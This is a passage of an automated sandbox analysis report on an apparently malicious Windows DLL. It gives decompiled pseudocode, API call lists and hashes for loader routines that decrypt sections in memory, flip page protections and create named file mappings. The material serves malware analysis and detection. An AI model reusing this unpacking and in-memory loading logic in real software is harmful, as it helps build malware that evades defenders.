                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3136044242-0
                                                                                                                                                                                                                                                              • Opcode ID: e19c01fcb2dabf9c0c44a239570506d0250d6b4427132a8591807f2bc07d51fd
                                                                                                                                                                                                                                                              • Instruction ID: 705ad72f6a5fe38e9a0e5b315135d9e22414935cab2c587c03429561aff63af6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e19c01fcb2dabf9c0c44a239570506d0250d6b4427132a8591807f2bc07d51fd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0215E71D0061EEBDB6A8F95C840EAE3A7BDB85B95B014525FC255E290C7308E418BA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 6E247387
                                                                                                                                                                                                                                                                • Part of subcall function 6E247BA4: RtlInitializeSListHead.NTDLL(6E28C780), ref: 6E247BA9
                                                                                                                                                                                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E2473F1
                                                                                                                                                                                                                                                              • ___scrt_fastfail.LIBCMT ref: 6E24743B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472989158.000000006E20E000.00000020.00020000.sdmp, Offset: 6E20E000, based on PE: false
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                              • String ID: y$n
                                                                                                                                                                                                                                                              • API String ID: 2097537958-731774800
                                                                                                                                                                                                                                                              • Opcode ID: 03c773252a9e12d70e1c67b1885047d40bc49dc83ff66e8d85105ef952ee57e9
                                                                                                                                                                                                                                                              • Instruction ID: 8954ef7617c6d924e6ce9f91539b90214a53234a7020ba776fc2eebe994fa279
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03c773252a9e12d70e1c67b1885047d40bc49dc83ff66e8d85105ef952ee57e9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF218B7A54820FDBDB096BF8D8097EC3B679F1672EF148859D8A12B2C0CF610059CA66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                                                              			E6E2015A3(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                                                                                              				unsigned int _v12;
                                                                                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                                              				void* _v36;
                                                                                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                                                                                              				signed int _v48;
                                                                                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                                                                                              				intOrPtr _t47;
                                                                                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                                                                                                              				signed int _t61;
                                                                                                                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                                                                                                              				void* _t78;
                                                                                                                                                                                                                                                              				signed int _t80;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t77 =  *0x6e2041b0;
                                                                                                                                                                                                                                                              				_t39 = E6E201A4B(_t77,  &_v20,  &_v12);
                                                                                                                                                                                                                                                              				_v16 = _t39;
                                                                                                                                                                                                                                                              				if(_t39 == 0) {
                                                                                                                                                                                                                                                              					asm("sbb ebx, ebx");
                                                                                                                                                                                                                                                              					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                                                                                                                                                                                                                                                              					_t78 = _t77 + _v20;
                                                                                                                                                                                                                                                              					_v36 = _t78;
                                                                                                                                                                                                                                                              					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                              					_v24 = _t46;
                                                                                                                                                                                                                                                              					if(_t46 == 0) {
                                                                                                                                                                                                                                                              						_v16 = 8;
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						_t61 = 0;
                                                                                                                                                                                                                                                              						if(_t59 <= 0) {
                                                                                                                                                                                                                                                              							_t47 =  *0x6e2041cc;
                                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                                              							_t66 = _a4;
                                                                                                                                                                                                                                                              							_t50 = _t46 - _t78;
                                                                                                                                                                                                                                                              							_t11 = _t66 + 0x6e205137; // 0x6e205137
                                                                                                                                                                                                                                                              							_v28 = _t50;
                                                                                                                                                                                                                                                              							_v32 = _t50 + _t11;
                                                                                                                                                                                                                                                              							_v8 = _t78;
                                                                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                                                                              								asm("movsd");
                                                                                                                                                                                                                                                              								asm("movsd");
                                                                                                                                                                                                                                                              								asm("movsd");
                                                                                                                                                                                                                                                              								_t19 = _t61 + 1; // 0x2
                                                                                                                                                                                                                                                              								_t80 = _t19;
                                                                                                                                                                                                                                                              								E6E201D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
                                                                                                                                                                                                                                                              								_t64 = _v32;
                                                                                                                                                                                                                                                              								_v8 = _v8 + 0x1000;
                                                                                                                                                                                                                                                              								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                                                                                                                                                                                                                                                              								_t61 = _t80;
                                                                                                                                                                                                                                                              								 *0x6e2041cc = _t47;
                                                                                                                                                                                                                                                              								if(_t61 >= _t59) {
                                                                                                                                                                                                                                                              									break;
                                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                                              								_t50 = _v28;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						if(_t47 != 0x63699bc3) {
                                                                                                                                                                                                                                                              							_v16 = 0xc;
                                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                                              							memcpy(_v36, _v24, _v12);
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						VirtualFree(_v24, 0, 0x8000); // executed
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				return _v16;
                                                                                                                                                                                                                                                              			}























                                                                                                                                                                                                                                                              0x6e2015aa
                                                                                                                                                                                                                                                              0x6e2015ba
                                                                                                                                                                                                                                                              0x6e2015c1
                                                                                                                                                                                                                                                              0x6e2015c4
                                                                                                                                                                                                                                                              0x6e2015d9
                                                                                                                                                                                                                                                              0x6e2015e0
                                                                                                                                                                                                                                                              0x6e2015e5
                                                                                                                                                                                                                                                              0x6e2015f6
                                                                                                                                                                                                                                                              0x6e2015f9
                                                                                                                                                                                                                                                              0x6e201601
                                                                                                                                                                                                                                                              0x6e201604
                                                                                                                                                                                                                                                              0x6e2016ae
                                                                                                                                                                                                                                                              0x6e20160a
                                                                                                                                                                                                                                                              0x6e20160a
                                                                                                                                                                                                                                                              0x6e20160e
                                                                                                                                                                                                                                                              0x6e201676
                                                                                                                                                                                                                                                              0x6e201610
                                                                                                                                                                                                                                                              0x6e201610
                                                                                                                                                                                                                                                              0x6e201613
                                                                                                                                                                                                                                                              0x6e201615
                                                                                                                                                                                                                                                              0x6e20161d
                                                                                                                                                                                                                                                              0x6e201620
                                                                                                                                                                                                                                                              0x6e201623
                                                                                                                                                                                                                                                              0x6e20162b
                                                                                                                                                                                                                                                              0x6e201633
                                                                                                                                                                                                                                                              0x6e201634
                                                                                                                                                                                                                                                              0x6e201635
                                                                                                                                                                                                                                                              0x6e20163c
                                                                                                                                                                                                                                                              0x6e20163c
                                                                                                                                                                                                                                                              0x6e201650
                                                                                                                                                                                                                                                              0x6e201655
                                                                                                                                                                                                                                                              0x6e20165e
                                                                                                                                                                                                                                                              0x6e201665
                                                                                                                                                                                                                                                              0x6e201668
                                                                                                                                                                                                                                                              0x6e20166c
                                                                                                                                                                                                                                                              0x6e201671
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201628
                                                                                                                                                                                                                                                              0x6e201628
                                                                                                                                                                                                                                                              0x6e201673
                                                                                                                                                                                                                                                              0x6e201680
                                                                                                                                                                                                                                                              0x6e201695
                                                                                                                                                                                                                                                              0x6e201682
                                                                                                                                                                                                                                                              0x6e20168b
                                                                                                                                                                                                                                                              0x6e201690
                                                                                                                                                                                                                                                              0x6e2016a6
                                                                                                                                                                                                                                                              0x6e2016a6
                                                                                                                                                                                                                                                              0x6e2016b5
                                                                                                                                                                                                                                                              0x6e2016bb

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E2015F9
                                                                                                                                                                                                                                                              • memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E2017EC), ref: 6E20168B
                                                                                                                                                                                                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E2016A6
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                                                              • String ID: Mar 26 2021
                                                                                                                                                                                                                                                              • API String ID: 4010158826-2175073649
                                                                                                                                                                                                                                                              • Opcode ID: dd859902b2a75f8948b4c6af869a88d54986826870b9f876fd2974cc00eb76c2
                                                                                                                                                                                                                                                              • Instruction ID: 4a82fa74dcbc3908fe8b5cbcfcbf5738aa89817352c5aeabbfea529264681777
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd859902b2a75f8948b4c6af869a88d54986826870b9f876fd2974cc00eb76c2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5315071E0060E9FDB01CF99CC84ADEB7BABF49308F148129D504A7285D771AA4ACF90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                                                              			E6E201D32(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                              				long _t3;
                                                                                                                                                                                                                                                              				int _t4;
                                                                                                                                                                                                                                                              				int _t9;
                                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_t13 = GetCurrentThread();
                                                                                                                                                                                                                                                              				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                                                                                                              				if(_t3 != 0) {
                                                                                                                                                                                                                                                              					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t4 = E6E2017A7(_a4); // executed
                                                                                                                                                                                                                                                              				_t9 = _t4;
                                                                                                                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                                                                                                                              					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                              				return _t9;
                                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                                              0x6e201d3b
                                                                                                                                                                                                                                                              0x6e201d40
                                                                                                                                                                                                                                                              0x6e201d4e
                                                                                                                                                                                                                                                              0x6e201d53
                                                                                                                                                                                                                                                              0x6e201d53
                                                                                                                                                                                                                                                              0x6e201d59
                                                                                                                                                                                                                                                              0x6e201d5e
                                                                                                                                                                                                                                                              0x6e201d62
                                                                                                                                                                                                                                                              0x6e201d66
                                                                                                                                                                                                                                                              0x6e201d66
                                                                                                                                                                                                                                                              0x6e201d70
                                                                                                                                                                                                                                                              0x6e201d79

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 6E201D35
                                                                                                                                                                                                                                                              • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E201D40
                                                                                                                                                                                                                                                              • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E201D53
                                                                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E201D66
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1452675757-0
                                                                                                                                                                                                                                                              • Opcode ID: ebca0716c880788973b5e29ca03ffb6befa8e3f2a5714a0beca9e4ed7bfc4bf1
                                                                                                                                                                                                                                                              • Instruction ID: 13e8736f14f54a9ed84a39fd23d4a5d03d39ad35bd8189f5dca93fd2d6991112
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebca0716c880788973b5e29ca03ffb6befa8e3f2a5714a0beca9e4ed7bfc4bf1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFE092313167152BD7022A694C8CEABBB5FEF933367010339F524D21D0DB948D4AC5B5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                                                              			E6E201030(void* __eax, void* _a4) {
                                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                                                                                              				long _v20;
                                                                                                                                                                                                                                                              				int _t43;
                                                                                                                                                                                                                                                              				long _t54;
                                                                                                                                                                                                                                                              				signed int _t57;
                                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                                              				signed int _t60;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                              				_t57 =  *0x6e2041cc;
                                                                                                                                                                                                                                                              				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                                                                                                                                              				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                                                                                                                                              				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                                                                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                              				if(_v16 <= 0) {
                                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                                              					return _v12;
                                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                                              					goto L1;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                                              					L1:
                                                                                                                                                                                                                                                              					_t60 = _v12;
                                                                                                                                                                                                                                                              					if(_t60 != 0) {
                                                                                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                                              					if(_t60 >= 0) {
                                                                                                                                                                                                                                                              						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                                              						if(__eflags >= 0) {
                                                                                                                                                                                                                                                              							L8:
                                                                                                                                                                                                                                                              							_t54 = _t57 - 0x63699bbf;
                                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                                              							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                                                                                                                                                              							if(_t43 == 0) {
                                                                                                                                                                                                                                                              								_v12 = GetLastError();
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              							_v8 = _v8 + 1;
                                                                                                                                                                                                                                                              							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                                                                                                                                                                                                                                              							if(_v8 < _v16) {
                                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                                              						_t54 = _t57 - 0x63699bc1;
                                                                                                                                                                                                                                                              						if(__eflags >= 0) {
                                                                                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                                              					if(_t60 >= 0) {
                                                                                                                                                                                                                                                              						_t54 = _t57 - 0x63699ba3;
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						_t54 = _t57 - 0x63699b83;
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                                              0x6e20103a
                                                                                                                                                                                                                                                              0x6e201047
                                                                                                                                                                                                                                                              0x6e20104d
                                                                                                                                                                                                                                                              0x6e201059
                                                                                                                                                                                                                                                              0x6e201069
                                                                                                                                                                                                                                                              0x6e20106b
                                                                                                                                                                                                                                                              0x6e201073
                                                                                                                                                                                                                                                              0x6e201108
                                                                                                                                                                                                                                                              0x6e20110f
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201079
                                                                                                                                                                                                                                                              0x6e201079
                                                                                                                                                                                                                                                              0x6e201079
                                                                                                                                                                                                                                                              0x6e20107d
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201089
                                                                                                                                                                                                                                                              0x6e20108d
                                                                                                                                                                                                                                                              0x6e2010b1
                                                                                                                                                                                                                                                              0x6e2010b5
                                                                                                                                                                                                                                                              0x6e2010c9
                                                                                                                                                                                                                                                              0x6e2010c9
                                                                                                                                                                                                                                                              0x6e2010cf
                                                                                                                                                                                                                                                              0x6e2010de
                                                                                                                                                                                                                                                              0x6e2010e2
                                                                                                                                                                                                                                                              0x6e2010ea
                                                                                                                                                                                                                                                              0x6e2010ea
                                                                                                                                                                                                                                                              0x6e2010f2
                                                                                                                                                                                                                                                              0x6e2010f5
                                                                                                                                                                                                                                                              0x6e201102
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201102
                                                                                                                                                                                                                                                              0x6e2010bd
                                                                                                                                                                                                                                                              0x6e2010c1
                                                                                                                                                                                                                                                              0x6e2010c7
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e2010c7
                                                                                                                                                                                                                                                              0x6e201095
                                                                                                                                                                                                                                                              0x6e201099
                                                                                                                                                                                                                                                              0x6e2010a3
                                                                                                                                                                                                                                                              0x6e20109b
                                                                                                                                                                                                                                                              0x6e20109b
                                                                                                                                                                                                                                                              0x6e20109b
                                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                                              0x6e201099
                                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E201069
                                                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E2010DE
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6E2010E4
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1469625949-0
                                                                                                                                                                                                                                                              • Opcode ID: f854a78ac2e99dc5c53e15fd94cfce5d47118e7416940e3f9f07c4211b953596
                                                                                                                                                                                                                                                              • Instruction ID: 9fbafa9024bf9604422ef881882092fe85f3f7649a485849829126f62b1321de
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f854a78ac2e99dc5c53e15fd94cfce5d47118e7416940e3f9f07c4211b953596
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E4214B31C0020BEFCB14CB95C885AAAF7FBFF08319F00885AD44697585E3B8A699CB51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                                                                                                                              			E6E2016EC() {
                                                                                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                                                                                              				void _v44;
                                                                                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                                                                                              				void* _v52;
                                                                                                                                                                                                                                                              				long _t23;
                                                                                                                                                                                                                                                              				int _t24;
                                                                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                                                                              				intOrPtr* _t30;
                                                                                                                                                                                                                                                              				signed int _t34;
                                                                                                                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                                                                                              				_push(0x6e2041c4);
                                                                                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                                                                                              				_push( *0x6e2041d0 + 0x6e205089);
                                                                                                                                                                                                                                                              				 *0x6e2041c0 = 0xc;
                                                                                                                                                                                                                                                              				 *0x6e2041c8 = 0; // executed
                                                                                                                                                                                                                                                              				L6E2014D8(); // executed
                                                                                                                                                                                                                                                              				_t34 = 6;
                                                                                                                                                                                                                                                              				memset( &_v44, 0, _t34 << 2);
                                                                                                                                                                                                                                                              				if(E6E201112( &_v44,  &_v28,  *0x6e2041cc ^ 0xfd7cd1cf) == 0) {
                                                                                                                                                                                                                                                              					_t23 = 0xb;
                                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                                              					ExitThread(_t23);
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t24 = lstrlenW( *0x6e2041b8);
                                                                                                                                                                                                                                                              				_t7 = _t24 + 2; // 0x2
                                                                                                                                                                                                                                                              				_t10 = _t24 + _t7 + 8; // 0xa
                                                                                                                                                                                                                                                              				_t28 = E6E201979(_t36, _t10,  &_v48,  &_v52); // executed
                                                                                                                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                                                                                                                              					_t30 = _v52;
                                                                                                                                                                                                                                                              					 *_t30 = 0;
                                                                                                                                                                                                                                                              					if( *0x6e2041b8 == 0) {
                                                                                                                                                                                                                                                              						 *((short*)(_t30 + 4)) = 0;
                                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                                              						E6E202112(_t40, _t30 + 4);
                                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                                              				_t23 = E6E201236(_v44); // executed
                                                                                                                                                                                                                                                              				goto L7;
                                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                                              0x6e2016fe
                                                                                                                                                                                                                                                              0x6e2016ff
                                                                                                                                                                                                                                                              0x6e201704
                                                                                                                                                                                                                                                              0x6e20170c
                                                                                                                                                                                                                                                              0x6e20170d
                                                                                                                                                                                                                                                              0x6e201717
                                                                                                                                                                                                                                                              0x6e20171d
                                                                                                                                                                                                                                                              0x6e201726
                                                                                                                                                                                                                                                              0x6e20172b
                                                                                                                                                                                                                                                              0x6e201749
                                                                                                                                                                                                                                                              0x6e20179e
                                                                                                                                                                                                                                                              0x6e20179f
                                                                                                                                                                                                                                                              0x6e2017a0
                                                                                                                                                                                                                                                              0x6e2017a0
                                                                                                                                                                                                                                                              0x6e201751
                                                                                                                                                                                                                                                              0x6e201757
                                                                                                                                                                                                                                                              0x6e201765
                                                                                                                                                                                                                                                              0x6e201769
                                                                                                                                                                                                                                                              0x6e201770
                                                                                                                                                                                                                                                              0x6e201778
                                                                                                                                                                                                                                                              0x6e20177c
                                                                                                                                                                                                                                                              0x6e20177e
                                                                                                                                                                                                                                                              0x6e20178d
                                                                                                                                                                                                                                                              0x6e201780
                                                                                                                                                                                                                                                              0x6e201786
                                                                                                                                                                                                                                                              0x6e201786
                                                                                                                                                                                                                                                              0x6e20177e
                                                                                                                                                                                                                                                              0x6e201795
                                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E2041C4,00000000), ref: 6E20171D
                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?), ref: 6E201751
                                                                                                                                                                                                                                                                • Part of subcall function 6E201979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E20176E,0000000A,?,?), ref: 6E201986
                                                                                                                                                                                                                                                                • Part of subcall function 6E201979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E20199C
                                                                                                                                                                                                                                                                • Part of subcall function 6E201979: _snwprintf.NTDLL ref: 6E2019C1
                                                                                                                                                                                                                                                                • Part of subcall function 6E201979: CreateFileMappingW.KERNELBASE(000000FF,6E2041C0,00000004,00000000,?,?), ref: 6E2019E6
                                                                                                                                                                                                                                                                • Part of subcall function 6E201979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E20176E,0000000A,?), ref: 6E2019FD
                                                                                                                                                                                                                                                                • Part of subcall function 6E201979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E20176E,0000000A), ref: 6E201A32
                                                                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 6E2017A0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.472920396.000000006E201000.00000020.00020000.sdmp, Offset: 6E200000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472896080.000000006E200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472934732.000000006E203000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472952779.000000006E205000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.472968446.000000006E206000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4209869662-0
                                                                                                                                                                                                                                                              • Opcode ID: 4d1eb4e5349fa546ca7b73c945138fb49ac9962e6a3c6df622563a118a556842
                                                                                                                                                                                                                                                              • Instruction ID: c80afdf793e84ad60df39c251faab025a5fd7575a280589de70965f1b790113e
